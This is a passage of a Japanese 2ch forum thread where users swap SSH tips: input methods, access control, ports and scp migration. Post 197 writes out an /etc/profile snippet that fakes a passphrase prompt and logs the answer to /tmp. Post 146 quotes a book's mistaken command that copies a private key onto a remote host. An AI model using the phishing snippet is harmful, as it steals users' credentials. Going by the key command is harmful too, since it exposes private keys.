SSH その8

[表示 : 全て最新50 1-99 101- 201- 301- 401- 501- 601- 701- 2ch.scのread.cgiへ]
Update time : 02/26 04:59 / Filesize : 178 KB / Number-of Response : 705
[このスレッドの書き込みを削除する]
[＋板最近立ったスレ＆熱いスレ一覧 : ＋板最近立ったスレ／記者別一覧] [類似スレッド一覧]


↑キャッシュ検索、類似スレ動作を修正しました、ご迷惑をお掛けしました

SSH その8

1 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/04/25(金) 18:50:57.67 .net]: SSHに関する情報交換のスレッドです。
FAQ、リンク集は >>2-5 あたり。

■前スレ
SSH その7
toro.2ch.net/test/read.cgi/unix/1266323017/

■過去スレ
その6 pc12.2ch.net/test/read.cgi/unix/1202782840/
その5 pc11.2ch.net/test/read.cgi/unix/1145484540/
その4 pc8.2ch.net/test/read.cgi/unix/1102242908/
その3 pc5.2ch.net/unix/kako/1058/10582/1058202104.html
その2 pc.2ch.net/unix/kako/1028/10281/1028157825.html
その1 pc.2ch.net/unix/kako/976/976497035.html
135 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/10/26(日) 13:36:46.74 .net]: その後 132 の姿を見る者は居なかった
136 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/10/26(日) 21:06:55.48 .net]: 132=129=127なのか、ネタレスだったのかはしらんけど、
本気でそれを客先でやったらとんでも無い事にはなるだろうなぁ…

sudoも出来ない状況だと、hddを別のに刺して直すしか思いつかん。
137 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/10/26(日) 21:30:38.39 .net]: いつもの改変コピペ君だよ
138 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/10/27(月) 14:20:34.23 .net]: UNIX板には死語レベルのコピペにマジレスするピュア()な中高年が多いですね
139 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/11/23(日) 17:53:17.21 .net]: SSH で接続すると、日本語入力ができなくなるのだが、、これって無理なの？

Cygwin → LinuxMint
LinuxMint → LinuxMint(別ユーザー)

ターミナルまたは、ssh -X で手元に表示したアプリでも日本語入力できない。
LinuxMint単独だと、 Mozcとかで日本語入力できてるんだけど。
140 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/11/24(月) 04:27:36.36 .net]: 普通はできるだろ…とりあえず文字コード合ってる？
141 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/11/24(月) 04:36:11.60 .net]: できないじゃなくて、どうなるか書かないと。
142 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/11/24(月) 05:16:14.38 .net]: >>139
この場合日本語入力はローカル側のが使われるんだよ。sshログイン先のホストのものではない。
必要な環境変数が設定されてないとエスパー。
143 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/11/29(土) 18:39:05.96 .net]: >139-142

失礼しやした。

結論から言うと、リモート先で、
export XMODIFIERS="@im=fcitx"
と入力することによって、
GUIアプリ(Firefoxとかgvim)でも、日本語入力(Mozc)ができるようになりました。

で、後は、この export 文を設定ファイルで自動読み込みさせたい。
.bashrc に書くのはイマイチだし、
かといって、.ssh/rc に書くと、
今度は、sshが、 xauth を読まなくなる。

これについては、
SSHのマニュアルか
www.unixuser.org/~euske/doc/openssh/jman/sshd.html
個人ページ
namazu.org/~tsuchiya/ssh/
uncorrelated.no-ip.com/20101225.shtml
を参考に対処できそう。
144 名前：143 mailto:sage [2014/11/29(土) 21:40:37.22 .net]: 自己レス

>>143

LinuxMint→LinuxMint へ、ssh -X でリモートログインした場合、
export XMODIFIERS="@im=fcitx"
すれば、gvim等のGUIアプリでも日本語入力のインターフェースが使えた。
だけど、~/.ssh/rc に記述すると xauth関連が良く分からないのであきらめ。
おとなしく、exportを手打ちするか、source することにした。

それから、
cygwin → LinuxMint へ ssh -X でリモートログインした場合は、
リモートの Xアプリ(gvim)にて、日本語入力インターフェースを使う方法が見つからなかった。

orz
145 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/11/30(日) 04:07:35.69 .net]: .xsession
146 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/11/30(日) 09:01:56.33 .net]: cat .ssh/id_rsa | ssh username@remotehost 'cat >> .ssh/authorized_keys; chmod 600 .ssh/authorized_keys'

これだと秘密鍵をremotehostに持ち出すことになるよね？
このあと特にエラーが出るわけでもないから初心者だと気づかないかも。
147 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/11/30(日) 10:48:50.82 .net]: なんで秘密キーを公開キーのファイルに追記してんの？ｗ
148 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/11/30(日) 10:54:42.92 .net]: >>146
公開鍵登録しろよ。多分id_rsa.pub
149 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/01(月) 10:23:39.78 .net]: >>146
そんなやり方どこで聞いたんだ
150 名前：名無しさん＠お腹いっぱい。 [2014/12/01(月) 11:04:16.75 .net]: >>147-149
川本安武とかいうバカが元凶のようだ。

books.google.co.jp/books?id=iUcoBQAAQBAJ&lpg=PR1&hl=ja&pg=PA35#v=onepage&q&f=false
151 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/01(月) 12:25:54.94 .net]: 「~/」を書かないんだな
152 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/01(月) 15:20:31.53 .net]: ~/はシェルに依存だから。
>>や;も意図したとおりに解釈してくれないかも知れないが。
153 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/03(水) 23:16:27.17 .net]: ~/ を解釈しないシェルって何だ？
dashもbusyboxのshも解釈するぞ
154 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/03(水) 23:38:30.85 .net]: 純正シェル。~はcsh由来だよ。
155 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/04(木) 00:06:43.07 .net]: /bin/shがThompson ShellとかBourne ShellでOpenSSHが入ってる環境とか
無理やり作ろうとしても大変だなｗｗ
156 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/04(木) 01:00:08.15 .net]: 商用UNIX環境で古いものだとそういうのもあるな
157 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/04(木) 01:37:00.88 .net]: うん、ありますね。
で、それをわざわざ使わせて
「~/ はこのシステムでは使えない、だからスクリプトを書く時は~/を使うな」
と教え込むんでしょうか？
158 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/04(木) 02:02:22.75 .net]: ~ を解釈しないシェルで ~ を使ってしまう危険性より
ホームディレクトリ以外で >>150 のコマンドを実行してしまう危険性の方が高いんじゃないかな。
159 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/04(木) 06:52:38.02 .net]: >>158
ホームディレクトリで実行する方が危険だろ。
それ以外ならエラーで済む。

お前、川本とかいうバカ本人? まだわかって無いの?
何冊売れたか知らんけど、その記述を鵜呑みにした読者を危険に晒してるんだぞ。
死ねば?
160 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/04(木) 07:44:13.26 .net]: >>150 = >>159 はここで作者disる暇あったらgihyoに本の回収絶版でも申請すれば？
161 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/04(木) 08:02:25.76 .net]: 正当な批判をdisってるとか。死ねば?
162 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/04(木) 08:58:42.72 .net]: だから訂正でも謝罪でも訴訟でもなく作者の死を望んで何になるのよ
163 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/04(木) 09:10:17.44 .net]: やっぱり川本本人か。ｗ
164 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/04(木) 09:51:36.60 .net]: オッスオラ川本！
165 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/04(木) 09:54:07.71 .net]: とりあえずお前があの本以外から一切の情報を仕入れず、ネットで検証もせず
鵜呑みにしてやらかして逆切れしたことはわかった
166 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/04(木) 09:56:28.68 .net]: 新山祐介さんの「入門OpenSSH」最強伝説がまた証明されてしまったな
ttp://www.unixuser.org/~euske/doc/openssh/book/index.html
おまえらネットも本も間違ってるから絶対に参考にするな
新山祐介さんの「入門OpenSSH」だけを参考にしろ
これ一冊あれば何もいらない
167 名前：名無しさん＠お腹いっぱい。 [2014/12/04(木) 09:58:54.50 .net]: 「正当な批判」は作者と出版社に直接届けないと本人のためにならないぞ
gihyo.jp/book/2014/978-4-7741-6807-4
https://twitter.com/togakushi
168 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/04(木) 10:55:15.15 .net]: 間違った記述すると、瞬殺で特定されるとかgoogleさん怖すぎ。
169 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/05(金) 00:16:32.57 .net]: >>165
161は160に死ねと言ってるのに162は作者に死ねといったと解釈した。
よって160＝162＝作者(というか筆者、川本)でなければ矛盾が生じるため、
「あの本以外から一切の情報を仕入れなかった被害者」である可能性を考慮する必要はない。
170 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/05(金) 02:41:18.78 .net]: >>169
著者に「死ねば」と言ったのは 159
171 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/05(金) 08:28:31.97 .net]: >>170
>>159は(川本かもしれない)>>158に「死ねば」と言った。
>>158が筆者であると断定できるのは>>158だけであるが、
お前は断定している。ゆえにお前が>>158であり川本本人。
172 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/05(金) 08:46:18.64 .net]: で、お前はこのスレで川本死ね川本死ねと呪詛を吐くだけで
他に被害者が出ないようになんとかしようという気は全く無いわけだ
>>167にある連絡先にクレームはちゃんとつけたのか？
173 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/05(金) 10:48:45.50 .net]: >>172
当たり前だ。タダでデバッグしてやる義理は無い。
174 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/05(金) 15:58:44.63 .net]: 読者を危険に晒した！というほどのおおげさなことなん？

chmod 600してるからremotehostが共用だとしても本人以外の一般ユーザーからは見れないはずだし、
rootが信頼できないならsshすること自体が危ないわけだし。

scpしてchmodする直前のスキをつくというのはナシね。

物理的にハードディスクが強奪されるかrootアカウントがクラックされるかして、さらにパスフレーズのオフライン解析なんて、そこまでして狙われる初心者ってそんなにいるとも思えない。
175 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/05(金) 17:09:10.53 .net]: >>174
> rootが信頼できないならsshすること自体が危ないわけだし。

そうなの? どんな危険性が?
176 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/05(金) 18:54:33.93 .net]: >>174
> rootが信頼できないならsshすること自体が危ないわけだし。
別のサーバーも同じキーペアで認証してたら何が起こるか考えてみたまえ。
177 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/05(金) 19:50:35.81 .net]: >>175
キーロガー入りのログインシェルやカーネルに差し替えられてたらアウトじゃん？
178 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/05(金) 22:19:24.59 .net]: >>176
いや、問題ないよね？秘密鍵のフォワードとかしてなければ
179 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/05(金) 23:00:17.54 .net]: cat .ssh/id_rsa
はタイプミスだろ。かなり痛いミスだけど。

やってることは公開鍵認証のベストプラクティスとしてじゃなくて、
公開鍵認証をするには .ssh/authorized_keys に公開鍵を追記しますよ、と言うのを説明するためにやってるだけでしょ。
アルゴリズムを説明するのに擬似コードで書いてあるようなものだろ。
180 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/05(金) 23:21:07.02 .net]: >>178
問題ないなら、お前の常用してる秘密鍵をここに貼り付けろよ。
181 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/06(土) 00:00:58.57 .net]: >>179
まぁどいつもこいつもわかってて弄ってるだけなので……
182 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/06(土) 00:01:43.20 .net]: >>180
ログイン先に秘密鍵おいておくとか頭煮えてるの？おだいじにね
183 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/06(土) 00:09:57.17 .net]: >>182
おれじゃなくて>>178に言え。痴呆症ジジイ。
184 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/06(土) 02:42:15.93 .net]: >>174
信用出来ない鯖という前提でsshするなら問題ない。
>>175
信用出来ない鯖にsshするついでにパスワード打ち込んだりエージェント転送しちゃう馬鹿には危険。
>>176
「sshすること自体が危ない」への反論ではなくさらなる危険の指摘だと思うけど、ちょっと言葉足らずだと思う。
>>177
信用出来ない鯖に保護したい情報打ち込んだりしないのでsshに脆弱性がなければ関係無いです。
ていうか脆弱性があってもそれを突く場合に差し替えるのはシェルやカーネルじゃなくsshdだろが。
>>178
176は「sshすること自体が危ない」への反論じゃなくて、アンカー先/引用部分が不適切なだけかと。
>>179
かなり痛いミスって指摘をいやそうじゃないってごねてるバカが居るように見える。
>>180 >>183
問題がないのは公開鍵を信用出来ないrootの居る鯖に置く行為の事だろ、馬鹿。

公開鍵と秘密鍵の区別がつかないとか、これも川本とか言う馬鹿のレスなのかなぁ…
185 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/06(土) 03:02:41.76 .net]: >>177
キーロガーあろうが、渡したくない情報を入力しなければ何も問題ない。
ウェブサーバーがログ取ってるからアクセスするの危険と言ってるようなもの。そりゃクレジットカード情報送るとかなら危険。

クライアント側で何か実行とかできるのかと思った。
186 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/06(土) 07:22:31.63 .net]: >>184
>>>180 >>183
>問題がないのは公開鍵を信用出来ないrootの居る鯖に置く行為の事だろ、馬鹿。

誤読だバカ。
>>176,>>180,>>183は全部オレだ。
「sshすること自体が危ない」ではなく「rootが信頼できないなら」への指摘だ。
言いがかりをつけるなら、どっちを引用したのか良く考えてからつけることだ。
187 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/06(土) 16:04:33.63 .net]: 誤記のひとつくらいしょうがないでしょ。
いずれ正誤表くらい出るよ。

一部のミスをあげつらって不安を煽るよりも、技術者全体のsshスキル底上げのためにも、むしろひとりでも多くの初心者が一度目を通すべきと思う。
188 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/06(土) 18:12:25.55 .net]: >>187
不安を煽るというか、秘密鍵を意図せずアップロードする行為はどう考えても普通に危ないわｗ
正誤表が出ても初心者の類がそんなん見に行くわけがないし正誤表が出ても推奨なぞできん。
189 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/06(土) 18:25:54.91 .net]: IPAに届けた上で、技評のトップページで謝罪訂正するレベル
190 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/06(土) 18:32:25.86 .net]: だな
初心者がWebなんぞ見れるはずが無い
191 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/06(土) 19:15:59.16 .net]: >>188
>>189
>>190
取ったな。

鬼の首。
192 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/06(土) 22:51:34.25 .net]: >>191
取った(殺った)というか拾った程度な感じ。
首を落とした奴を崇め奉ってる奴が居るから鬼の首みたいな扱いになってるけど、
実際の所は路肩のゴミを拾った程度の話でしか無い。さっさと捨てよう、こんなの。
193 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/06(土) 23:13:35.29 .net]: 鬼? 雑魚だよ。
194 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/06(土) 23:57:36.44 .net]: 結局、ただのやっかみかよ。
195 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/07(日) 00:04:20.63 .net]: >>194
どこをどう読んだらそんな解釈になるんですか川本さん
196 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/07(日) 01:02:14.05 .net]: このスレに、川本さんは何人いるんだ。
197 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/07(日) 23:50:08.35 .net]: 悪いrootが不精ならオフライン解析より/etc/profileでフィッシングする方が効率的かもね

# /etc/profile
if grep "RSA PRIVATE KEY" /home/$USER/.ssh/authorized_keys > /dev/null; then
sleep 3
echo "Connection to $HOSTNAME closed."
read -s -p "Bad passphrase, try again for /Users/$USER/.ssh/id_rsa: " passphrase
echo "$passphrase" >> /tmp/passphrase-$USER
fi
198 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/15(月) 12:41:54.46 .net]: 良記事
togakushi.bitbucket.org/build/html/OpenSSH_AdventCalendar2014/index.html
199 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/16(火) 11:02:27.42 .net]: あーあ何か変な奴に粘着されたなこのスレも…
200 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/18(木) 09:07:32.46 .net]: >>199
おはよう、川本君。IPAには届け出たかね?
201 名前：名無しさん＠お腹いっぱい。 mailto:sage [2014/12/18(木) 11:35:04.54 .net]: 川本が！川本が俺を殺しに来る！！
あいつのせいで俺の鍵が流出した！！！
川本許さねえ！絶対にゆるさねえええええええええええええええええええええ！！！！！！！！！１１

これぐらいキレてもいいんだよきみ
202 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/04/03(金) 16:29:47.36 .net]: あけましておめでとう。
みんな、22 開けて使ってるの？
22 開いてるのがわかると root で突撃して来る .cn のバカが鬱陶しいから別ポートに変えちゃった。
203 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/04/03(金) 22:17:35.30 .net]: >>202
オレもポートは変えてる。
204 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/04/06(月) 09:38:02.97 .net]: fail2banしてるから22のままだなあ。
premitRootLogin noだしpassword認証も受け付けてないし。
205 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/04/06(月) 13:57:05.84 .net]: 22の方が便利ってわけでもないから変えてる
わざわざ余計なログ吐かせて眺める趣味もないし
206 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/04/07(火) 11:27:12.23 .net]: 話の流れを切って悪いが、アクセス制限について質問です。

自宅用のSSHサーバーを作ろうと思って入門書を読んでいるんだが、
TCP Wrappeによるアクセス制限とPAM認証によるアクセス制限の違いがいまいちわからない。
例えば同一LAN内からのアクセスのみを許可したい場合、

＜TCP Wrapperの場合＞/etc/hosts.denyに「sshd:all」、hosts.allowに「sshd:192.168.」
＜PAM認証の場合＞/etc/security/access.confに「-:ALL:ALL EXCEPT 192.168.」

どっちでも同じ効果が得られる気がするんだが、挙動に違いはある？
PAM認証を用いた方が細かく制御できるってだけ？
悪い接続元を弾くタイミングが違うとか？
207 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/04/07(火) 16:29:56.81 .net]: >>206
素人扱いするな、そんなことは知っている、って逆切れするような人じゃないことを祈りながら書く。

tcp wrapperも PAM もsshdに内蔵されているものではない。別個に開発されたライブラリをsshdが利用している。
機能に重複があるのは、そのせい。ユーザー(サーバ管理者)が利用するものを選んで設定する。

hosts.allow、denyを使う場合と、access.confを使う場合だが、動作の違いはある。
PAMはユーザーを認証するもの、tcp wrapperはコネクションを制限するもの。
なのでtcp wrapperはコネクションの最初で効く。PAMの認証は、その後で行われる。
これはsshdに限らない話。
tsharkなどを使ってモニターすると、接続が拒否されるタイミングがわかる。

sshd(openssh)の場合はPAM以外にもユーザー認証があり(ChallengeResponseAuthentication、PasswordAuthentication、PubkeyAuthenticationなど)
そっちで認証が通ればPAMで認証されなくてもログインできる。
これはSSH始めました、の頃によくやる失敗なので、要注意。

設定ファイルの仕組みの話になるが
hosts.deny、allowにsshd:xxx と書けば、これはsshd限定だが
access.confはsshd以外も参照している可能性がある点も注意が必要。
208 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/04/07(火) 18:21:18.49 .net]: >>207
正に知りたい答えでした。
この前に入門書を買ったばかりでググってもイマイチ分からなかったので、素人でも分かる説明で助かります。

ありがとうございました！
209 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/04/07(火) 23:46:54.67 .net]: 具体的な質問　に　的確な回答
単純明快なやりとりは見てて清清しい
いい夜をありがとう
210 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/04/08(水) 01:50:50.85 .net]: >>206
OpenSSH 6.7以降だとtcpwrappers/libwrapのサポートが削除されてるから注意しとけよ
211 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/04/28(火) 11:48:29.85 .net]: 本日 psi.ip-colo.net からお越しになったお客様
PlcmSpIp 様、admin 様、backup 様、ftpuser 様、guest 様
manager 様、monitor 様、root 様、support 様、test 様
ubnt 様、user 様
212 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/04/28(火) 13:15:39.86 .net]: もてもてだね。
213 名前：名無しさん＠お腹いっぱい。 [2015/05/31(日) 16:59:57.64 .net]: Tera Term r2【テラターム】 - No.823
peace.2ch.net/test/read.cgi/unix/1225116847/823n
823 ：823：2015/05/31(日) 16:53:55.57
> バージョン4.87リリース記念age！
>
> OpenSSH 6.8に接続できなくなってパニックになったサーバー管理者の方々
> が多かったのではないでしょうか。
> ということで、この問題が修正されたものが本日公式にリリースされました
> ので、利用者はアップグレードをオススメしときます。
214 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/05/31(日) 18:34:44.39 .net]: なんか懐かしい名前だ。
Windows からは Cygwin の ssh だからどうでもいい。
215 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/05/31(日) 20:10:21.19 .net]: 自分もputtyもteratermも捨ててcygwinの使ってるわ
216 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/05/31(日) 22:32:37.52 .net]: Cygwinはなー……ということでMSYS2派
217 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/05/31(日) 22:34:07.81 .net]: ログ取りはscriptとか使うの？
218 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/06/03(水) 18:28:09.16 .net]: cygwinもMSYS2も、遠からず捨てる日が来るのかな
219 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/06/03(水) 18:34:35.17 .net]: とっくにwindowsを捨ててる
220 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/06/04(木) 05:26:26.98 .net]: とっくにwindowsを捨ててる(ｷﾘｯ
221 名前：名無しさん＠お腹いっぱい。 [2015/06/04(木) 20:38:59.15 .net]: 質問失礼致します。

scpコマンドで
「リモートサーバー」と「そことローカル接続しているサーバー」で、
ファイルのやり取りは可能でしょうか？

具体的には、旧筐体から新筐体へデータ移行を行いたいのです
ただし旧筐体はネットワークから切り離されているという状況です
222 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/06/04(木) 20:51:37.76 .net]: ローカル接続とは具体的にどのように接続しているのでしょうか？
新筐体がリモートサーバーで、旧筐体が、そこ(新筐体のことでしょうか？)とローカル接続しているサーバーですか？

新筐体と旧筐体がローカルなネットワークで接続されていて
今の場所から、旧筐体にはログインできないが、
新筐体にはログインできて、新筐体から旧筐体にはログインできるのなら
新筐体と旧筐体の間でscpなりrsyncなりなんなりと使えるでしょう。

FTPのサーバー間転送みたいなことはできませんけど。
223 名前：名無しさん＠お腹いっぱい。 [2015/06/04(木) 21:03:36.40 .net]: >>222
まさにそういう事です！

新筐体から旧筐体へはどのようにログインすればいいんでしょうか？

qiita.com/maximum80/items/26034cf51f1ed5ce5988
こちらなどを見たんですが、新筐体へはログイン出来ましたが、
新筐体から旧筐体へのログイン方法が分かりません
224 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/06/04(木) 21:35:54.66 .net]: 旧筐体にはsshでログインできてましたか？
まず新筐体にログインします。これは出来てるんですね。
シェルが使えるとします。
scpはsshと同じログイン方法なので、パスワードで入れていたのなら

scp 旧筐体のユーザー名@旧筐体のサーバー名(IPアドレスのほうが確実かも):旧筐体内でのファイル名なりディレクトリ名新筐体のディレクトリ名

scp root@192.168.1.20:/home/ /home
こんな感じですかね
225 名前：名無しさん＠お腹いっぱい。 [2015/06/04(木) 21:49:55.09 .net]: >>224
大変ありがとうございます。

旧筐体にはログイン出来てないです

$ ssh redadmin@192.168.1.20
とやってみたんですが、駄目でした
226 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/06/04(木) 23:20:28.21 .net]: >>225
まず、ログインできるようにしないと
227 名前：名無しさん＠お腹いっぱい。 [2015/06/04(木) 23:47:23.18 .net]: >>226
これの事でしょうか？

簡単sshログイン方法
qiita.com/maximum80/items/a453ed00ac96cab77f08

新筐体と旧筐体、どちらを設定すればいいんでしょう？
228 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/06/05(金) 00:18:01.59 .net]: そりゃあ勿論、旧筐体にsshでログインできるようにする。
今までどうやってログインしてましたか？
229 名前：名無しさん＠お腹いっぱい。 [2015/06/05(金) 00:24:12.21 .net]: >>228
旧筐体にはログインした事ないです

新筐体はIPアドレス・ID・パスワードでログインしました

使用したSSHクライアントソフトは
Poderosa
Tera Term
です
230 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/06/05(金) 00:33:05.47 .net]: >>229
管理者権限でログインしないと設定できません。
旧筐体の管理者はどうしていますか？
旧筐体の中をあけてハードディスクを取り出したりできますか？
231 名前：名無しさん＠お腹いっぱい。 [2015/06/05(金) 00:38:02.48 .net]: >>230
色々本当ありがとうございます。

redadminでログイン後
rootにスイッチしました

因みにこれまでのはレンタルサーバーでの話です

旧筐体がクラックされた恐れがあるとかで、ネットワークから切り離され
新筐体へのデータ移行はサポート外なので自分でやれと言われてます
232 名前：名無しさん＠お腹いっぱい。 [2015/06/05(金) 00:40:36.82 .net]: >>230
旧筐体の管理者はどうやったら分かりますか？
233 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/06/05(金) 00:54:44.94 .net]: >>231
　redadminでログイン後
どうやってログインしたのでしょうか？
　$ ssh redadmin@192.168.1.20
　とやってみたんですが、駄目でした
もう一度やってみたら出来たのですか？
234 名前：名無しさん＠お腹いっぱい。 [2015/06/05(金) 01:08:40.42 .net]: Poderosaで
新筐体IPアドレス・ID(redadmin)・パスワード
を設定してログイン

$ su → パスワードを訊かれてrootログイン

出来たのはここまでです。

$ssh-keygen
$ vi ~/.ssh/config
$ cat ~/.ssh/id_rsa.pub >> ~/.ssh/authorized_keys
/etc/ssh/sshd_config
などをいじりましたが、旧筐体にはログイン出来ません

ssh redadmin@旧筐体のローカルIPアドレス
が旧筐体への接続コマンドだと案内されました
235 名前：名無しさん＠お腹いっぱい。 mailto:sage [2015/06/05(金) 03:44:48.64 .net]: >>234
public keyは旧筐体に入れないとダメです。

ssh redadmin@旧筐体のローカルIPアドレス
でパスワードを聞かれませんか？

[ 続きを読む ] / [ 携帯版 ]

read.cgi ver5.27 [feat.BBS2 +1.6] / e.0.2 (02/09/03) / eucaly.net products.
担当:undef